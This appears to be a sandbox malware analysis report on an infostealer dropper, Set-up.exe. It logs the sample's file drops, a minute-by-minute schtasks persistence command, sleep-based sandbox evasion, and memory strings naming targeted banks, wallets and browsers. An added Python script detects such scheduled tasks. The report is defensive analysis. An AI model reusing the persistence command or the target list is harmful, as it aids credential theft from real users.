Source: Set-up.exe, 00000000.00000002.2666887733.00000000019A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameschtasks.exej% vs Set-up.exe
Source: Set-up.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@8/2@1/1
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\kLjWvVQjXk
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1888:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\fwFEVxyGBFjyQWNlspqq
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe
Source: Set-up.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Set-up.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Set-up.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: Set-up.exe, 00000000.00000003.2195576685.0000000003AB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Set-up.exe ReversingLabs: Detection: 28%
Source: Set-up.exe Virustotal: Detection: 35%
Source: unknown Process created: C:\Users\user\Desktop\Set-up.exe "C:\Users\user\Desktop\Set-up.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: edputil.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: netutils.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: wintypes.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: appresolver.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: slc.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: sppc.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\Desktop\Set-up.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: uwgcijbilmbudmolckmv.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: uwgcijbilmbudmolckmv.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: uwgcijbilmbudmolckmv.dll
Source: C:\Users\user\Desktop\Set-up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Set-up.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: Set-up.exe Static file information: File size 9991168 > 1048576
Source: Set-up.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2c4a00
Source: Set-up.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x671000
Source: Set-up.exe Static PE information: DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_00018230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 5_2_00018230
Source: Set-up.exe Static PE information: section name: .eh_fram
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: UwGCIJbIlmBudMOlckMv.dll.0.dr Static PE information: section name: .eh_fram
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_0001A521 push es; iretd 5_2_0001A694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3F0C30 push eax; mov dword ptr [esp], edi 5_2_6C3F0DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3BED10 push eax; mov dword ptr [esp], ebx 5_2_6C3BEE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C394E31 push eax; mov dword ptr [esp], ebx 5_2_6C394E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C388E7A push edx; mov dword ptr [esp], ebx 5_2_6C388E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C38A947 push eax; mov dword ptr [esp], ebx 5_2_6C38A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3BEAB0 push eax; mov dword ptr [esp], ebx 5_2_6C3BEBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C392AAC push edx; mov dword ptr [esp], ebx 5_2_6C392AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3A8AA0 push eax; mov dword ptr [esp], ebx 5_2_6C3A909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C390AA2 push eax; mov dword ptr [esp], ebx 5_2_6C390AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3C2BF0 push eax; mov dword ptr [esp], ebx 5_2_6C3C2F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3C2BF0 push edx; mov dword ptr [esp], ebx 5_2_6C3C2F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C388435 push edx; mov dword ptr [esp], ebx 5_2_6C388449
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3A8460 push eax; mov dword ptr [esp], ebx 5_2_6C3A8A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C38048B push eax; mov dword ptr [esp], ebx 5_2_6C3804A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3804E0 push eax; mov dword ptr [esp], ebx 5_2_6C3806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C361CFA push eax; mov dword ptr [esp], ebx 5_2_6C416622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C38A5A7 push eax; mov dword ptr [esp], ebx 5_2_6C38A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3C2620 push eax; mov dword ptr [esp], ebx 5_2_6C3C2954
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3C2620 push edx; mov dword ptr [esp], ebx 5_2_6C3C2973
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3D06B0 push eax; mov dword ptr [esp], ebx 5_2_6C3D0A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3986A1 push 890005EAh; ret 5_2_6C3986A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3806A2 push eax; mov dword ptr [esp], ebx 5_2_6C3806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3806A6 push eax; mov dword ptr [esp], ebx 5_2_6C3806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3806FD push eax; mov dword ptr [esp], ebx 5_2_6C3806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3866F3 push edx; mov dword ptr [esp], ebx 5_2_6C386707
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C38070E push eax; mov dword ptr [esp], ebx 5_2_6C3806DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C38A777 push eax; mov dword ptr [esp], ebx 5_2_6C38A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C390042 push eax; mov dword ptr [esp], ebx 5_2_6C390056
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C35E0D0 push eax; mov dword ptr [esp], ebx 5_2_6C416AF6
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\UwGCIJbIlmBudMOlckMv.dll
Source: C:\Users\user\Desktop\Set-up.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe

Boot Survival

Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\Desktop\Set-up.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\Set-up.exe Process information set: NOOPENFILEERRORBOX
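
The command line above is worth decoding rather than just matching. /sc once with /st 00:01 schedules a single run, but /ri 1 together with /du 9800:59 tells Task Scheduler to repeat that run every minute for 9800 hours 59 minutes (about 408 days), so service123.exe is relaunched every minute if it is killed or crashes; /f replaces any existing task named ServiceData4 without prompting; and the action path carries a mixed separator (Temp\/service123.exe) that a naive string compare against the dropped-file path will miss. The following is an added example, not part of the report, of detection logic for process-creation telemetry: it parses schtasks /create command lines, flags actions under user-writable directories (the condition behind the Sigma hit in the overview) and reports the repetition schedule. The event records are constructed; the first command line is the one the sandbox observed, the benign task, the directory list and the set of value-taking switches are assumptions.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Directories from which a persistent task action is rarely legitimate (assumed list).
# Matched against the action path after separators and case are normalised.
SUSPICIOUS_DIRS = (
    "\\appdata\\local\\temp\\",
    "\\appdata\\roaming\\",
    "\\windows\\temp\\",
    "\\users\\public\\",
)

# schtasks switches that consume the following token as their value.
VALUE_SWITCHES = {"/tn", "/tr", "/sc", "/st", "/du", "/ri", "/mo", "/sd", "/ed",
                  "/ru", "/rp", "/rl", "/xml", "/s", "/u", "/p", "/d", "/m", "/i"}


@dataclass
class TaskCreate:
    name: str = ""
    action: str = ""                    # /tr, the program the task runs
    schedule: str = ""                  # /sc (once, minute, daily, onlogon, ...)
    start: str = ""                     # /st HH:MM
    duration_min: Optional[int] = None  # /du HHHH:MM converted to minutes
    repeat_min: Optional[int] = None    # /ri repetition interval in minutes
    force: bool = False                 # /f: replace an existing task of that name
    opts: dict = field(default_factory=dict)


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted spans whole."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def norm_path(p):
    """Lower-case and collapse mixed separators such as Temp\\/service123.exe."""
    return re.sub(r"[\\/]+", r"\\", p).lower()


def parse_schtasks(cmdline):
    """TaskCreate for a 'schtasks /create ...' command line, None for anything else."""
    toks = tokenize(cmdline)
    if not toks or "schtasks" not in toks[0].lower():
        return None
    opts, i = {}, 1
    while i < len(toks):
        sw = toks[i].lower()
        if sw in VALUE_SWITCHES and i + 1 < len(toks):
            opts[sw], i = toks[i + 1], i + 2
        else:
            opts[sw], i = True, i + 1
    if "/create" not in opts:
        return None
    task = TaskCreate(name=str(opts.get("/tn", "")), action=str(opts.get("/tr", "")),
                      schedule=str(opts.get("/sc", "")).lower(), start=str(opts.get("/st", "")),
                      force=opts.get("/f") is True, opts=opts)
    m = re.fullmatch(r"(\d+):(\d{2})", str(opts.get("/du", "")))
    if m:  # /du is HHHH:MM
        task.duration_min = int(m.group(1)) * 60 + int(m.group(2))
    if str(opts.get("/ri", "")).isdigit():
        task.repeat_min = int(opts["/ri"])
    return task


def findings(task):
    """Why this task creation looks like malware persistence; empty list if it does not."""
    reasons = []
    action = norm_path(task.action)
    for d in SUSPICIOUS_DIRS:
        if d in action:
            reasons.append(f"action runs from user-writable directory {d}")
            break
    if task.repeat_min is not None and task.repeat_min <= 5:
        span = f" for about {task.duration_min // 1440} days" if task.duration_min else ""
        reasons.append(f"re-runs every {task.repeat_min} min{span}: a relaunch watchdog")
    if task.force and reasons:
        reasons.append("/f replaces any existing task of that name without prompting")
    return reasons


# Constructed Sysmon-style process-creation records. The first command line is
# the one the sandbox observed; the other two are invented benign activity.
EVENTS = [
    {"Image": "C:\\Windows\\SysWOW64\\schtasks.exe",
     "CommandLine": r'"C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" '
                    r'/tr "C:\Users\user\AppData\Local\Temp\/service123.exe" '
                    r'/st 00:01 /du 9800:59 /sc once /ri 1 /f'},
    {"Image": "C:\\Windows\\System32\\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /tn "NightlyBackup" '
                    r'/tr "C:\Program Files\Backup\backup.exe" /sc daily /st 02:00'},
    {"Image": "C:\\Windows\\System32\\schtasks.exe",
     "CommandLine": r'schtasks.exe /query /tn "NightlyBackup"'},
]


def scan(events):
    """(task name, action, reasons) for every flagged schtasks /create in events."""
    hits = []
    for ev in events:
        task = parse_schtasks(ev["CommandLine"])
        if task is not None and (reasons := findings(task)):
            hits.append((task.name, task.action, reasons))
    return hits


if __name__ == "__main__":
    for name, action, reasons in scan(EVENTS):
        print(f"[!] {name} -> {action}")
        for r in reasons:
            print("   ", r)
```

On a live host the same decoding applies to the task itself: the registered action and the repetition trigger survive in the task XML under C:\Windows\System32\Tasks even after the Temp payload has been deleted, which is what to pull during triage.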

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\Set-up.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 813
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.2 %
Source: C:\Users\user\Desktop\Set-up.exe TID: 5988 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 1308 Thread sleep count: 813 > 30
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 1308 Thread sleep time: -81300s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\Desktop\desktop.ini
Source: Set-up.exe Binary or memory string: VMware
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Set-up.exe, 00000000.00000003.2185018616.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2154640438.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2425407959.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2666887733.0000000001983000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW{
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Set-up.exe Binary or memory string: UT0VT.node-rednode_modules.quokkaMPC-HCMPC-BEPotPlayerMiniDaumVMwareCCleanerBrowser.exeD:G:I:F:H:C:DewMobileBorisFXInnovative SolutionsimloifkgjagghnncjkhggdhalmcnfklkbackupMultiBitHDwalletsleveldbrecoveryIntel(R)Microsoft_CorporationGoogle Web DesignerDevice MetadataWindows MailK-MeleonVSCommonvshubVS Revo Group@trezorLedger LiveMarc Gravell.tlauncherjvmsjava(local_dir_header_ofs & (pZip->m_file_offset_alignment - 1)) == 0Opera GXDefaultOpera CryptoOpera DeveloperOperaOpera UnknownOpera Beta/home/anal/bot/zip_include/zip.c(zip->entry.header_offset & (pzip->m_file_offset_alignment - 1)) == 0bit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATOR(cur_archive_file_ofs & (pZip->m_file_offset_alignment - 1)) == 0WebStorageVideoDecodeStatsoptimization_guide_prediction_model_downloads4kdownload.com\bluestacks-services\atomic\AMD
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: Set-up.exe, 00000000.00000000.2043681328.00000000017D7000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: .node-rednode_modules.quokkaMPC-HCMPC-BEPotPlayerMiniDaumVMwareCCleanerBrowser.exeD:G:I:F:H:C:DewMobileBorisFXInnovative SolutionsimloifkgjagghnncjkhggdhalmcnfklkbackupMultiBitHDwalletsleveldbrecoveryIntel(R)Microsoft_CorporationGoogle Web DesignerDevice MetadataWindows MailK-MeleonVSCommonvshubVS Revo Group@trezorLedger LiveMarc Gravell.tlauncherjvmsjava(local_dir_header_ofs & (pZip->m_file_offset_alignment - 1)) == 0Opera GXDefaultOpera CryptoOpera DeveloperOperaOpera UnknownOpera Beta/home/anal/bot/zip_include/zip.c(zip->entry.header_offset & (pzip->m_file_offset_alignment - 1)) == 0bit_flags & MZ_ZIP_LDH_BIT_FLAG_HAS_LOCATOR(cur_archive_file_ofs & (pZip->m_file_offset_alignment - 1)) == 0WebStorageVideoDecodeStatsoptimization_guide_prediction_model_downloads4kdownload.com\bluestacks-services\atomic\AMD
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Set-up.exe, 00000000.00000003.2185018616.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2154640438.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2425407959.0000000001983000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2666887733.000000000193E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000002.2666887733.0000000001983000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Set-up.exe, 00000000.00000003.2195784293.0000000003ADE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_00018230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 5_2_00018230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_0001116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 5_2_0001116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_00011160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 5_2_00011160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_000111A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 5_2_000111A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_000113C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 5_2_000113C9
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\Set-up.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 5_2_6C3C84D0 cpuid 5_2_6C3C84D0
